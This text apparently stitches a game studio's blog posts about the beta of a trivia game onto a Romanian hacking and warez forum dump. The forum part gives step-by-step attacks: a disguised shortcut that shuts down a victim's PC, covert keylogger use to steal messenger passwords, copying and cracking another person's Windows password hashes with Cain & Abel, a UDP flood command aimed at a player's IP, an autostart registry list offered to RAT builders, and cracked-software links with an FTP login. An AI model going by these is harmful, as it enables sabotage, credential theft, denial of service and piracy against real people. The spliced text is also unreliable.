Interrupting Cow Trivia, a fun new trivia game that you can play online with your friends, is now in open public beta. Based on your feedback from our first MULTIPLAYER TEST-A-THONS last week, we’ve made some very big changes to the way you play the game. Here’s the feedback we keyed in on, based on what you wrote on our survey:. The game is too punishing.
It stinks to type in the correct answer milliseconds too slowly. (one player described this as suffering a “headshot” the moment he entered the game. Well-put!). Most 10-player games ended with 3 players on the scoreboard, and everyone else with zero points. That’s no fun!. You should be able to accomplish something in the game even if you’re not the fastest typist.
Seriously – how am i supposed to type with THESE THINGS? (Photo used with permission of ) Ch-ch-changes So since this is a fun game and not grade eight gym class, we took your suggestions and made some changes. Here are the Rules of Play for the next iteration of Interrupting Cow Trivia: How to Play. You’ll see a hint and up to three clues fill the screen. After the clues are finished, the letters in the answer start to fill in.
When you know the answer, type it into the blue box and press the ENTER key. Answer Order. Everyone has a chance to answer. As your opponents answer, green checkmarks appear beside their player names. When all players have answered, or the question times out, we’ll give the Streak to the player who answered first. All players earn points according to how quickly they answered.
Scoring. All questions are worth 1000 points. The longer the question stays on the screen, the fewer points it’s worth. The first player to correctly answer a question gets the Streak – a multiplier that boosts a question’s point value.
Razer Coupons, Sales & Promo Codes For Razer coupon codes and deals, just follow this link to the website to browse their current offerings. And while you're there, sign up for emails to get alerts about discounts and more, right in your inbox.
The Streaker’s multiplier increases with every question he answers first. Any player can break the Streak and become the Streaker by answering first. BIG thanks to for specifically suggesting these changes, and to all our other testers who suggested similar tweaks. We’ll try these rules out in our next multiplayer test. If they’re great, we’ll keep ’em!
If they suck, we’ll chuck ’em! Everybody Wins! Er that should say “gamers”, not “children”. Our next scheduled multiplayer beta test, “Everybody Wins!”, is on Thursday January 14 2010. We’ll do two tests:.
Everybody Wins! At 4:00 PM EST. Everybody Wins!
At 8:00 PM EST If you’ve played the game before, we’d LOVE to hear what you think of the new rules. If you have a friend who’s never played, here’s a fact: WE ADORE VIRGINS. Invite that special someone along to play with you.
The doors open at 4PM and 8PM sharp at. See you in the game!
kmlflashembed publishmethod=”dynamic” fversion=”8.0.0″ movie=”width=”545″ height=”185″ targetclass=”flashmovie” wmode=”transparent” /kmlflashembed This entry was posted in and tagged, on. PROTIP (and something i didn’t realize until now): soliciting directed feedback from people gives you far, FAR more useful advice than asking for any old feedback.
BAD: Q: What do you think of my dress? A: You should be wearing a pantsuit. A: It doesn’t make your ass look as fat as that other dress. A: Let’s talk about your shoes instead.
They’re terrible. A: Get an entirely different dress. That shade of blue makes me think of the Korean War.
GOOD: Q: How would you tailor this dress to make it fit my body better? A: i’d take it in at the waist slightly.
A: Needs to be tighter at the waist – perhaps lower the neckline. A: I think it fits pretty well.
A: A bit loose around the middle. Maybe shorten the sleeves. Ah, this – THIS feedback is the stuff of my dreams.
I’ve had a rough road this week with catastrophically bad news at the office, and a steaming pile of terrible feedback from certain game developers who should know better (but of course i’m not talking about you, dear reader). No one was having fun in the game alone, so we rounded everyone up and scheduled two play times for.
Everyone popped in, the test ran for an hour, and we locked up the game again. Then we asked players to fill out a short survey. The difference in the quality of feedback was like night and day. Or rather, it was like the difference between getting shot in the gonads with a crossbow at night, and day. Lobbying for Change One mystery that remains to be solved is the feedback we’ve received about the game’s lobby. We may not have asked enough directed questions about this, but general consensus is that the lobby UI stinks. Without more pointed constructive criticism, i don’t know how to address this.
So let’s tackle it together! Here’s a shot of the Lobby that players saw in our recent playtests. Here’s a list of the things you can do here:. The “down” arrow next to “High Scores” expands that box. Player scores are listed there, along with your ranking (if you’re logged in).
The blue arrows scroll the High Scores list. Filter the list by Friends, Foes, Members, Guests, etc. By using the drop-down. Click on any player name to see the Profile Pop-up (as long as the player is a member). Roll over the tables to see the table name and category. Click the “PLAY” button beneath any table to join a game.
Click on a table to get the Table Details Pop-Up, which tells you who’s playing at the table and what the table settings are. Click to see a list of who’s online. Click to start your own table. Click to refresh the table list. The blue arrows scroll the table list. Click to return to the Game Options screen.
It Was Fine Until People Had to Use It Here’s a summary of feedback:. Many players suggested we build a High Scores feature. This, despite the “High Scores” label in a 22-point font at the top of the screen, with a sparkly pink udder crown next to it. Some players sat at this screen and waited, expecting something to happen. They did not know that action was required on their part to join a game. Some players did not recognize the large circles under the heading “Tables” as tables where games were taking place.
The metaphor was, perhaps, unfamiliar. The three icons went unnoticed. A few players came to this screen in private beta when no one else was playing, and concluded that the game could not be played solo. They complained that they should be able to play by themselves. (i admit, this one mystified me just join a table if you want to play. Doesn’t matter how many other players are online.).
Generally, enough players came to this screen and were confused as to what they were supposed to do. During the private beta, we thought the problem was that the screen contained too much text, so we tightened it up in a number of places, and changed some textual buttons to icons with text pop-ups to remove visual clutter. Here’s a before and after comparison. She’s lost 20 pounds on the ThatMakesMoreSense Diet! We’re Giving Her All She’s Got, Cap’n Apparently, based on our more helpful feedback in the multiplayer tests, we haven’t done enough. Can you help us play detective and figure out why this Lobby screen causes people so much grief, and make specific suggestions to improve it?
One idea we have already is to actually add text – a call to action that tells the player something like “CHOOSE A TABLE AND CLICK ‘PLAY'”. Something like that.
Idea #2: kill the “tables waiting” text, because it’s not that useful. Idea #3: redesign the arrow buttons Idea #4: Put the category in the middle of the table, instead of the word “waiting”. Perhaps players wait at this screen because they see the word “waiting” everywhere?
Is there anything we’re missing? You Should See the Other Guy To digress, it amazes me that we’ve had so many complaints about the lobby.
For your amusement, please take a quick look at the game selection screens for these competing trivia products. The wait is over! This Thursday, goes into open public beta.
Open public means YOU, dear reader. You’ll finally be able to experience what a select few have only enjoyed in private, with the door locked and the blinds drawn. And since the game is a thousand per cent more fun with other players, we’re scheduling two MULTIPLAYER PLAYTEST-A-THONS:.
Thursday January 7th 4:00 PM EST. Thursday January 7th 8:00 PM EST That’s tomorrow!!
Unless you’re reading this at some point in the future, in which case, YOU MISSED IT! What’s the future like, space man? Don’t you wish they’d invent a time machine so that you can go back and play in one of the MULTIPLAYER PLAYTEST-A-THONS?? They already have?? See you tomorrow!
If you’ve been following our for Interrupting Cow Trivia, you know that we’ve lined up some amazing for the game. Tomorrow, you’ll see the full monty. The game is fully skinned with a. There’s new content, new features, and a new cow. Here’s a run-down of what you’ll see at 4PM or 8PM tomorrow: New Cow! As endearingly brain-damaged as our was, we’ve put her out to pasture.
Our new cow has been specially formulated to appeal to Japanese pre-teen girls and gay men over 40, which we count as a win/win. Plus, she wears ROLLERSKATES!
A number of testers have complained that our current content is too difficult. To these whiny bitches, we humbly recommend nutting up. There’s plenty of pasture in Farmville to let your brain slowly go to mush.
To the rest of you smart cookies who were BORN to school sucka MCs at trivia, we offer these awesome new question packs:. Movies – Actors We give you the genre, year, and three actors. You tell us what movie they starred in. TV – Actors Same deal as Movies, but the screen is smaller and the actors make less money and usually die tragically. TV – Characters Given three character names, can you name the TV show they were in?. Music – Lyrics We’ll give you a band name and the lyrics to a famous song. What’s the song called?.
Wordplay – Idioms This one sounds like it’s for nerds, but it’s fast and easy and super-fun. Finish the popular phrases: Too many cooks.
A stitch in time. Crazy like. Mad as.
Two heads. New Features!
Get a load of our lobby, where you can check out high scores and join games. You can create a custom table with the trivia YOU want to play. Your XP bar is now front and center, so you can keep a better eye on how you’re levelling. And, as before, you can click any player’s name to see his or her stats, and add that player to your Friends or Foes lists. DID YOU TOTALLY KNOW? Your Friends and Foes lists persist across the Untold Entertainment message boards.
Join the Herd. Follow the Cow. We’ve created a special Twitter account for the game, and are working on some great Twitter features for you Twits to enjoy.
Follow for reminders about when the MULTIPLAYER TEST-A-THONS are starting, and the cow will keep you in the loop. And hook you up with the link. See you all tomorrow at 4PM or 8PM EST!
kmlflashembed publishmethod=”dynamic” fversion=”8.0.0″ movie=”width=”545″ height=”185″ targetclass=”flashmovie” wmode=”transparent” /kmlflashembed This entry was posted in and tagged, on. Now that the are drawn and the launch features are almost complete for Interrupting Cow Trivia, we’re finally turning our attentions to the game’s visuals. If you played the, you would have found a fully-functional game with no graphics. This is the story of how we got from there to here, and the decisions that informed the look of the game.
A Different Kind of “M” for Mature Through early play-testing, i realized that young people don’t like trivia. Trivia’s no fun when you don’t know any of the answers. And the younger you are, the less likely you are to know stuff. Based more on a hunch than actual market research, we decided that our target audience was this guy. Mom and Dad’s money well-spent. These are college-aged smarty-pantses who play weekly trivia at the pub, but can’t always afford the six-dollar beers and the time away from the dorm.
Design by Hunch Put that all together, and we came up with the idea to stage Interrupting Cow Trivia at a restaurant, to re-create that social pub feel. Specifically, it’s a 50’s-style diner, in a nod to the baby boomers. And not a grungy, dilapidated diner like something out of Fallout or Bioshock. It’s a shiny, sparkly 50’s diner in its heyday. We hope that the theme will make older players feel welcomed and comfortable, while younger players will dig it as a retro curiosity. So a 50’s-style diner needs a 50’s-style User Interface (UI or “MOO-I”, as it says in the title of this post, because we’re under contract to include at least one awful cow pun in every ICT Designer Diary entry).
We carefully studied menu designs from retro 50’s diners, and put this together in our first attempt. This has the right amount of “pop”, both visually and stylistically.
Expect the beta version of ICT to be packed with fun, bubbly 50’s UI that’ll make players want to stay in the game longer, and will encourage players to buy an ICT Diners Club Card for some groovy perks. kmlflashembed publishmethod=”dynamic” fversion=”8.0.0″ movie=”width=”545″ height=”185″ targetclass=”flashmovie” wmode=”transparent” /kmlflashembed This entry was posted in and tagged, on. Down in the old Texas town of El Paso The cool blue hue and lonely atmosphere of this shot deliberately juxtapose the warm, bright and busy interior of the diner. The party is clearly inside, after you click the “Multiplayer” button. Next week, we’d like to show you the game’s 50’s-riffic user interface design, which you’ll definitely recognize if a) you’re over 60 yrs old or b) you’ve ever bought pants at Old Navy.
If you haven’t played lately – or ever! – be sure to give it a shot while we’re still in alpha. We’ll be rolling out advertising along with these newfangled graphics, so take a moment to enjoy the game for free without ads. kmlflashembed publishmethod=”dynamic” fversion=”8.0.0″ movie=”width=”545″ height=”185″ targetclass=”flashmovie” wmode=”transparent” /kmlflashembed This entry was posted in and tagged, on. Post navigation.
Valute Blaster: url=1)Mu bot HahaMU este aplicatzia mea preferata potzi sa intri cu cate conturi vrei u fara sa ai lag sau sa ti se sacadeze as putea spune ca face cat tot clientul de mu plus multe alte functzi te potzi teleporta pe ce coordonate vrei vrei u de pe harta pe care te afli potzi face party perfect intrnd cu mai multe conturi il lasi afk iar botul vb se plimba,omoara, da buf, aduna itemele dorite, goleste inventori etc. Putetzi downloada de aici =2)Data1 dupa ce dezarhivezi copiezi din data1 world 1,2,3 si le pui in data clientului de mu care il doresti si vei putea sa alergi, in oras si sa ataci monstri ornamentali care mai sunt pe unele servare.
Contine: Golden Eye Crackers Kit CIA Commander Host Scan Net Tools Soft Ice Google Hacker Chain & Abal Access Driver Athena MM Virus Gen H. Descide Computerul meu (My computer) 2. Dute la C: Program Files Internet Explorer SIGNUP 3)Modifica numele fisierului 'INSTALL.INS' in 'INSTALL.txt' si descidel in notepad 4.Dute putin mai jos si vei gasi:'WindowTitle=Microsoft Internet Explorer', acum scimba Microsoft Internet Explorer in ce vrei tu (Ai grija! Numai Microsoft Internert Explorer. Nu WindowTitle=!
Nu umbla la nimik alteva.) 5.salveazal si modifica iara numele in 'INSTALL.INS',dupaia descidel si daca te intreba daca vrei sa modificati setarile internetului, Apasa OK. 6.Dai un restat si esti gata. Dati click dreapta oriunde pe desktop, si selectati New si pe urma shortcut.
2.In spatiul pentru adresa scrieti urmatoarele shutdown.exe -s -t 20 -c 'aici scrieti mesajul ce va aparea victimei' 3.pentru a fi mai eficient setati timpul dorit(secunde)pana la inchiderea PC-ului victimei inlocuiti 20 cu numarul dorit 4. Dati next si alegeti numele dorit pentru a pacali victima dupa care dati finish 5 Dati click dreapta pe noul programel creat si schimbatii iconita cu una potrivita. Pe urma mai ramane sa trimiteti la cineva pe messenger acest 'programel' ca sa`i stingeti pc.
Razz Mult Succes La hack!Wink. Vrei sa afli parola de yahoo mess a altcuiva: Pentru a afla parola de mess a altcuiva exista mai multe variante insa nu le voi prezenta aici! Singura varianta pe care v-o pot arata presupune instalarea unui program pe care unele antivirusuri il poate detecta ca troian. Acest program inregistreaza toate tastele apasate la un calculator si se numeste Family Keylogger. Deci pentru a afla parola trebuie sa invitati persoana nefericita la un calculator care are instalat keylogger-ul.
Programul de aflat parole, de fapt ce a fost tastat se poate descarca de Aici http://www.spyarsenal.com/. ORipa Yahoo Webcam Recorder is a handy tool to record Yahoo webcam video and audio of chat partner to your PC hard disk so you can replay it in.ure.
Just press the record button as the Yahoo webcam is connected, and the video streams are saved as media files in your preset folder. You can play the recorded videos back at any media player and at any time you like! Here's why oRipa Yahoo Webcam Recorder is the ultimate webcam recorder for Yahoo Messenger. Work with Yahoo Messenger 6.0 and the above versions. Real time record Yahoo webcam with optional sound recording (e.g. Audio from microphone)-You can record any webcam streams (e.g. The fun movies broadcasted in webcam by your chat partner as well as the video conversations, etc.) 3.
Real time compress your recorded videos (DivX compatible) during recording - use this function to get a smaller file size of your output videos so there is no need to worry your hard disk space is not enough for your video files when you record for a long time! Save recorded videos into AVI format files-you can use any player (e.g. Real, Windows Media Player, etc.) you have to play the recorded video. You can minimize or hide the Yahoo Messenger window while recording.-That means You can browse other web pages and no need to let your Yahoo webcam window always on the front web page. Easy to use!-You just start/stop recording with a click from the icon menu. No need to know about the recording knowledge.
Other cool features you would prefer: adjustable FPS and frame size (for you to adjust your output video quality) and user defined save-to directory. Download Code: http://rapidshare.com/files/194260723/YahooWebcamRecorder.withcrack.rar.
Slow down, freeze, crash and security threats are over. Advanced SystemCare Personal is a comprehensive PC care utility that takes an one-click approach to help protect, repair and optimize your computer. Scanning and finding what other utilities miss, it can keep your PC error-free and smooth than ever. This fantastic program is available free of charge. Compared with its nearest competitor, Advanced SystemCare Personal provides the more essential and practical formula for Windows:. One-click Per Day.
Removing Spyware and Adware. Preventing Security Threats. Privacy Protection. Fixing Registry Errors. Temporary Files Cleanup. Startup Cleanup.
Repairing Windows. Speeding up System download Code: http://rapidshare.com/files/195412482/Advanced.System.Care.PRO.v3.1.2DGNVENGENCE.r. ProShow Gold is the complete slide show software solution for sharing your best memories on DVD, PC, and the Web!
Bring still photos to life by adding motion effects like pan, zoom, and rotate. Add captions to a photo or video and choose from over 280 exciting transition effects. It's easy to tell your story with ProShow Gold. Create slide shows for any occasion! Use ProShow Gold to easily create stunning slide shows for friends, family, business, or just for fun!
Just select your photos and drop them in the show. Record your own voice-over track or add a soundtrack from a CD. Add motion effects and pick from over 280 stunning transition effects to add that final touch. Take your photos further!
ProShow Gold gives you more output options than any other slide show software. Create DVDs and video CDs that play back on your TV. Stream your show on the Web. Generate MPEG video files for PC viewing. Build screen savers for yourself or others. Make self-contained executable slide shows (EXEs), perfect for e-mailing or posting online. Write PC autorun CDs that automatically play when inserted into a PC.
ProShow Gold does it all! Amazing Effects! ProShow Gold allows you to add motion effects to your images and video.
Zoom in to points of interest. Pan around on a panoramic image. You can even rotate a photo or video while the slide show is playing. FEATURES: Add and Edit Content Easily - New!
Add an unlimited number of layers to any slide - Drag and drop to easily add content to a show - Supports 100+ file types - Transparency support for PSD, PNG, TIFF and GIF files - Built-in video trimmer crops video clips precisely - New! Make good photos great with editing tools including crop, red-eye removal, rotate, flip, sharpen, drop shadow, colorize, etc. One-click color correction automatically optimizes your photos - Set custom timing for each slide or modify many slides at once.
Special Effects that Amaze - New! Bring any photo to life with motion effects - Pan photos, including panoramic; rotate photos to any angle - Precise motion control—use composition lines for perfect alignment - New! Scale/zoom photos to any size with increased zooming range - Set acceleration styles for motion effects - New! Choose from 280+ transition effects—specify the random transition effects feature to only the styles you want - Control timing for each transition - Randomize motion and transition effects for your slide show in seconds - Add an unlimited number of captions to enhance your show - Set captions to any font, size, style and color - New!
Add fun to your captions—choose from the expanded set of 100+ caption effects, including the iconic Galactic Scroll Use Music to Set Any Mood - New! Create a soundtrack instantly by adding any MP3, WMA or WAV file to your show - you'll see the waveform in the slide list - Import music from any audio CD with the built-in audio ripper - Use the built-in audio trimmer to crop songs and add fades - Add audio clips, such as sound effects or voice overs, to any slide - Record voice-over narrations for documentary-style effects - Control volume for your soundtrack and audio clips independently - Sync your slide show to your music with one click Fast and Easy Show Creation - New! Timeline view makes it easier to control the timing in your show - Automatic show backup and recovery keeps work safe - Collect show files to any folder, CD or DVD for archiving - New! Built-in editing and output tools minimize the need to switch back and forth between 3rd party programs - New! JDownloader - the program for automatic download files from sites: RapidShare.com, RapidShare.de, depositfiles.com, filefactory.com, uploaded.to, megaupload.com, megashares.com, vip-file.com, upshare.net, youtube.com, myvideo.de, imagefap.com, files.to etc. JDownloader - the program for automatic download files from sites: - RapidShare.com - RapidShare.de - depositfiles.com - filefactory.com - uploaded.to - megaupload.com - megashares.com - vip-file.com - upshare.net - youtube.com - myvideo.de - imagefap.com - letitbit.com -uploading.com & alot more hosters download Code: Mirror Mirror http://www.easy-share.com//JDownloaderv0.4.464.rar. Protect your valuable data by locking your PC with just a double click.
These days, computers are everywhere: from banks and government offices to shops and homes. People tend to rely on tireless machines more and more every day.
We store our valuable data, personal and business-critical information, photos, credit card information, important phone numbers and vast amount of other private information on our hard drives. We install firewalls and anti-virus software to protect this data from outside intrusions and hijacks.
However, according to reports by IT specialists, the majority of electronic data theft crimes happen due to improper protection of computer systems from the inside. Human factor is still the greatest security issue today.
Download Now you can see what's hiddenhttp://rapidshare.com/files/195363538/LockMyPC.4.0.5.577DGNVENGENCE.rar. Code: ftp://warezbb.ro:[email protected]/2.
JOCURI/Steam Cs (multe jocuri) contine majoritatea jocurilor, cele mai importante: Counter Strike (1.6) Half-Life Counter Strike Condition Zero Counter Strike Condition Zero Deleted Scenes Counter Strike Source Counter Strike Source Beta DoD (Day of Defeat) DoD Source Half Life 2 Half Life 2: Episode One +multe altele/list:u Credits: -PoT-Cr3w mirror: Mirror Owned =)) am pus killcode in loc de download code. Il uploadez iar pass: [email protected] Added after 28 minutes: Cod: http://rapidshare.de/files/27430171/steam4wbb.rar.html.
Nu stiu daca s-a mai postat asa ceva, acest tutorial este facut de mine, dupa ce am auzit de undeva ca trebuie sa folosesc custom search engine. Dupa cum probabil ati observat google filtreaza cautarile gen intitle:'index of'. Pentru a scapa de aceasta restrictie mergeti pe: www.google.com/cse.
Va faceti aici un custom search engine ( la url's scrieti pe fiecare linie:.com.net.ro etc. Astfel va cauta in tot domeniul ), dupa aceea intrati din management in homepage. De acum in continuare merg majoritatea searchurilor dar pentru unele merge doar prima pagina. Daca incerc intitle:'The Non Designer's Web Book' voi primi eroare daca incerc sa accesez a 2-a pagina. Aveti 2 optiuni: ori puteti viziona pagina cu pagina sau cate 100 de searchuri de-odata.
1.Pagina cu pagina. Pentru primul search voi avea linkul: inainte de &sa=Search ( de la final ) scrieti &start=10 si o sa ajunga asa: Pentru a 3-a pagina in loc de 10 scrieti 20 si-asa mai departe 2.Cate 100 rezultate pe o singura pagina. Dupa &q=intitle%3A%22The+Non+Designer%27s+Web+Book%2 2 adaug &asepq=&asoq=&aseq=&num=100&lr=&asfiletype=&ft =i&assitesearch=&asqdr=all&asrights=&asocct=an y&cr=&asnlo=&asnhi=&safe=images si va ajunge: Daca sunt mai multe pagini puteti folosi tehnica de la punctul 1. Vrei sa faci ca si cum un calculator s-a conectat la un anumit site/server TCP?
Raspunsul la intrebare este insusi acest post, dar o sa mai explic si alte mici parti ale conexiunilor TCP (adica folosind protocolul TCP), adica majoritatea conexiunilor. Acest post explica baza unei conexiuni (desi multi fac programe prin care un client se conecteaza la server fara sa stie de fapt ce se intampla). Nu este mare lucru, dar ideea de baza de aici poate fi folosita pentru a face atacuri complexe si efective. In mod normal pentru ca sa faci o conexiune TCP/IP trebuie sa trimiti un pachet SYN, sa primesti unul SYN+ACK si sa o inchizi cu ACK. Noi nu avem cum sa primim SYN+ACK ca sa 'inchidem' conexiunea. Poate va intrebati 'Ce este asa de important in acel pachet?' Raspunsul este acknowledgment number (care este important doar daca primim ACK), un numar pe care trebuie sa il trimitem inapoi ca sa aratam ca noi suntem cu adevarat calculatorul care a trimis cererea de conexiune.
Dar, folosind wireshark oricine poate observa ca acel numar este aproape intotdeauna 1. Asa ca putem face acest lucru usor. Folosind ip-ul victimei si portul X tu trimiti un pachet cu care arati ca vrei sa faci o conexiune noua (SYN). Trimitem pachetul cu SYN+ACK aproape imediat (nu vrem sa ajunga primul, pentru ca desi rar, se mai intampla). Dupa aceea putem trimite de exemplu cererea unei pagini cu un pachet simplu si date: 'GET /index.html HTTP/1.1'. Dupa aceste 3 pachete TCP/IP victima o sa primeasca pe portul X un pachet SYN+ACK (cel pe care noi l-am ghicit) si continutul paginii index.html de pe serverul pe care am deschis noi conexiunea si poate si alte pachete ca RST (in cazul in care serverul vrea sa reseteze conexiunea) sau FIN+ACK in cazul in care vrea sa o inchida (asta se intampla la serverele web, serverul vrand sa inchida conexiunea imediat dupa ce a trimis continutul paginii). Ca sa nu las oarecum neterminat (pentru ca orice conexiune se si inchide) o sa incerc sa explic si cum se inchide o conexiune.
Acest lucru este un pic mai complicat (si nu o sa poti ghici asa de usor acknowledgement number). Notam calculatorul care vrea sa inchida conexiunea cu A si pe celalalt cu B. A ii trimite lui B FIN+ACK; B ii trimite lui A ACK; B ii trimite lui A FIN+ACK; A ii trimite lui B ACK. Dar dupa ce te-ai conectat nu mai poti ghici acknowlidgement number ca sa inchizi conexiunea. (cel putin eu nu am reusit) Este facut de mine de la 0 din ceea ce am citit pe wikipedia, dar am mai folosit si wireshark ca sa observ reteaua, netul sau simple programe ale mele. Astept pareri.
Lista e buna pentru cei care fac RAT's sau programe care pornesc cu Windows-ul. Code: Registry Autostart Locations 1. HKEYLOCALMACHINE Software Microsoft Windows Curr entVersion Run All values in this key are executed. HKEYLOCALMACHINE Software Microsoft Windows Curr entVersion RunOnce All values in this key are executed, and then their autostart reference is deleted. HKEYLOCALMACHINE Software Microsoft Windows Curr entVersion RunServices All values in this key are executed as services.
HKEYLOCALMACHINE Software Microsoft Windows Curr entVersion RunServicesOnce All values in this key are executed as services, and then their autostart reference is deleted. HKEYCURRENTUSER Software Microsoft Windows Curre ntVersion Run All values in this key are executed. HKEYCURRENTUSER Software Microsoft Windows Curre ntVersion RunOnce All values in this key are executed, and then their autostart reference is deleted.
HKEYCURRENTUSER Software Microsoft Windows Curre ntVersion RunOnce Setup Used only by Setup. Displays a progress dialog box as the keys are run one at a time.
HKEYUSERS.Default Software Microsoft Windows Cur rentVersion Run Similar to the Run key from HKEYCURRENTUSER. HKEYUSERS.Default Software Microsoft Windows Cur rentVersion RunOnce Similar to the RunOnce key from HKEYCURRENTUSER.
HKEYLOCALMACHINE Software Microsoft Windows NT CurrentVersion Winlogon The 'Shell' value is monitored. This value is executed after you log in. HKEYLOCALMACHINE Software Microsoft Active Setup Installed Components All subkeys are monitored, with special attention paid to the 'StubPath' value in each subkey. HKEYLOCALMACHINE System CurrentControlSet Servic es VxD All subkeys are monitored, with special attention paid to the 'StaticVXD' value in each subkey. HKEYCURRENTUSER Control Panel Desktop The 'SCRNSAVE.EXE' value is monitored. This value is launched when your screen saver activates.
HKEYLOCALMACHINE System CurrentControlSet Contro l Session Manager The 'BootExecute' value is monitored. Files listed here are Native Applications that are executed before Windows starts. HKEYCLASSESROOT vbsfile shell open command Executed whenever a.VBS file (Visual Basic Script) is run. HKEYCLASSESROOT vbefile shell open command Executed whenever a.VBE file (Encoded Visual Basic Script) is run. HKEYCLASSESROOT jsfile shell open command Executed whenever a.JS file (Javascript) is run. HKEYCLASSESROOT jsefile shell open command Executed whenever a.JSE file (Encoded Javascript) is run.
HKEYCLASSESROOT wshfile shell open command Executed whenever a.WSH file (Windows Scripting Host) is run. HKEYCLASSESROOT wsffile shell open command Executed whenever a.WSF file (Windows Scripting File) is run. HKEYCLASSESROOT exefile shell open command Executed whenever a.EXE file (Executable) is run. HKEYCLASSESROOT comfile shell open command Executed whenever a.COM file (Command) is run.
HKEYCLASSESROOT batfile shell open command Executed whenever a.BAT file (Batch Command) is run. HKEYCLASSESROOT scrfile shell open command Executed whenever a.SCR file (Screen Saver) is run. HKEYCLASSESROOT piffile shell open command Executed whenever a.PIF file (Portable Interchange Format) is run.
HKEYLOCALMACHINE System CurrentControlSet Servic es Services marked to startup automatically are executed before user login. HKEYLOCALMACHINE System CurrentControlSet Servic es Winsock2 Parameters ProtocolCatalog CatalogEn tries Layered Service Providers, executed before user login. HKEYLOCALMACHINE System Control WOW cmdline Executed when a 16-bit Windows executable is executed. HKEYLOCALMACHINE System Control WOW wowcmdline Executed when a 16-bit DOS application is executed. HKEYLOCALMACHINE Software Microsoft Windows NT CurrentVersion Winlogon Userinit Executed when a user logs in. HKEYLOCALMACHINE Software Microsoft Windows Curr entVersion ShellServiceObjectDelayLoad Executed by explorer.exe as soon as it has loaded. HKEYCURRENTUSER Software Microsoft Windows NT CurrentVersion Windows run Executed when the user logs in.
HKEYCURRENTUSER Software Microsoft Windows NT CurrentVersion Windows load Executed when the user logs in. HKEYCURRENTUSER Software Microsoft Windows Curre ntVersion Policies Explorer run Subvalues are executed when Explorer initialises. HKEYLOCALMACHINE Software Microsoft Windows Curr entVersion Policies Explorer run Subvalues are executed when Explorer initialises. Folder Autostart Locations 1.
Windir Start Menu Programs Startup 2. User Startup 3. All Users Startup 4.
Windir system iosubsys 5. Windir system vmm32 6.
Windir Tasks File Autostart Locations 1. C: explorer.exe 2. C: autoexec.bat 3. C: config.sys 4.
Windir wininit.ini 5. Windir winstart.bat 6. Windir win.ini - windows 'load' 7. Windir win.ini - windows 'run' 8.
Windir system.ini - boot 'shell' 9. Windir system.ini - boot 'scrnsave.exe' 10. Windir dosstart.bat 11. Windir system autoexec.nt 12. Windir system config.nt Bafta!
Nu stiu daca s-a mai gandit cineva la asta pana acuma, dar eu. Pardon, unii oameni au folosit aceasta metoda si inca o mai folosesc cu succes. Ma refer bineinteles la obtinerea de domenii.ro.com.net si.org. OK, asta e primul meu tutorial in care am sa prezint cum se pot AFLA parolele userilor de windows. Stiu ca exista si alte metode de aflare sau modificare a lor, mie personal aceasta mi se pare cea mai simpla. Deci daca nu stiti cum se face si v-a schimbat tata parola la cont din cauza ca va jucati prea mult, vreti sa intrati in calculatorul unui prieten sau poate banuiti ca cineva foloseste aceeasi parola si la mail, cititi acest mic tutorial.
Ceea ce aveti nevoie: 1. Sa nu existe parola de bios SAU 2. Sa fiti logat deja cu un user oarecare. 1 Parola de bios inexistenta sau stiuta Bootati de pe un live cd de linux, si copiati pe un stick fisierele SAM si SYSTEM din. Windows System32 config.Din cauza faptului ca sunt protejate si nu se pot copia, trebuie sa bootati de pe alt sistem de operare. Inchideti calculatorul si reschimbati ordinea de bootare, dupa care plecati la un calculator in care puteti lucra in siguranta, fara a fi prinsi.
Deschideti Cain&Abel, daca nu aveti downloadati de pe net, si in tabul de cracker, la categoria LM&NTML,adaugati fisierele furate de pe calculatorul victima prin optiunea Import hashes from a SAM database.(la boot key adaugati fisierul system). Odata ce ati adaugat hash-urile, le puteti sparge in modul dorit(brute force, dictionary sau rainbow tables) si voila, aveti parolele. Trebuie sa mentionez k sistemul de encriptare a parolelor folosit de windows functioneaza in felul urmator: Orice parola este transformata in uppercase letters inainte de a fi encryptata. Apoi,daca parola are mai mult d 7 caractere, va fi impartipa in 2 parti, prima parte continand primele 7 caractere si a 2-a parte restul( hash tip LM), reducand considerabil timpul de spargere.
Nu sunt sigur ce tip de encriptare este folosit(cel mai probabil MD5 sau MD4). 2.acces la un cont din calculator Aduceti p un stick Cain, deja instalat(in caz k nu aveti permisiuni de instalare), rulati si atunci cand adaugati parola, selectati 'Import hashes from local system' si procedati la fel. In functie de parola, poate fi sparta instant sau poate fi aproape imposibil de spart. In caz ca aveti intrebari, postati aici sau trimiteti PM. Deci, sfaturile mele sunt urmatoarele: puneti-va parola de bios,nu sheruiti folderul de Windows sau Documents and settings si aveti grija pe cine lasati la calculator.
Din greseala am dat peste un programel ce functioneaza pe porturile UDP (la fel ca si Counter Strike). Ce face acest programel? Trimite foarte multe date in continuu la infinit si provoaca un lag imens.
Nu a fost creeat pentru asa ceva dar. Am avut eu un feeling ca va functiona daca voi incerca. Mare atentie: daca il veti folosi de pe pc-ul vostru este posibil sa aveti probleme pentru ca va apare ip-ul real. Si da, functioneaza pe orice server de Counter Strike si probabil are efect asupra oricarei aplicatii ce foloseste protocolul UDP. Programul il puteti downloada de aici: (click dreapta pe link si save as. Altfel nu va porni download) sau de aici: Folositi sintaxa urmatoare: Cod: udpsz -l 0 hostname.domeniu.ro 5 Sau daca vreti ca un jucator sa aiba lag mare sau sa nu se poata conecta pe NICIUN server puneti ip-ul lui si port 27005 Exemplu: Cod: udpsz -l 0 212.1.1.1 5 Inlocuiti hostname.domeniu.ro cu serverul in care vreti sa dati sau 212.1.1.1 cu ip-ul jucatorului pe care vreti sa il floodati individual.
Mie mi-a mers. Am gasit tutorialul pe net cand incercam sa obtin o cheie pentru varianta beta.
Tutorialul original este la stealthsettings.com. Microsoft pune la dispozitie doua link`uri de download pentru w7 unul pentru varianta de 32 de biti si altul pentru varianta de 64 de biti. Link 1: Link 2: Fara renumitul product key de la Microsoft, puteti extinde durata de viata a Windows 7 Beta Trial, de la 30 de zile la 120 de zile, folosind comanda slmgr –rearm. Puteti obtine un product key pentru Windows 7 Beta daca urmati pasii: 1. Mergeti la technet.microsoft.com si logati-va folosind userul si parola de la hotmail sau live.com (aveti optiunea de Sign In in coltul din dreapta-sus a paginii); daca nu aveti cont va puteti face unul; 2. Copiati (nu dati click!!) unul din linkurile de mai jos (click-dreapta pe link-Copy link location), dati paste in address bar pe pagina de la technet.microsoft.com, apoi dati Enter. Va fi afisat codul care va permite sa inregistrati Windows 7 Beta(evaluation copy).
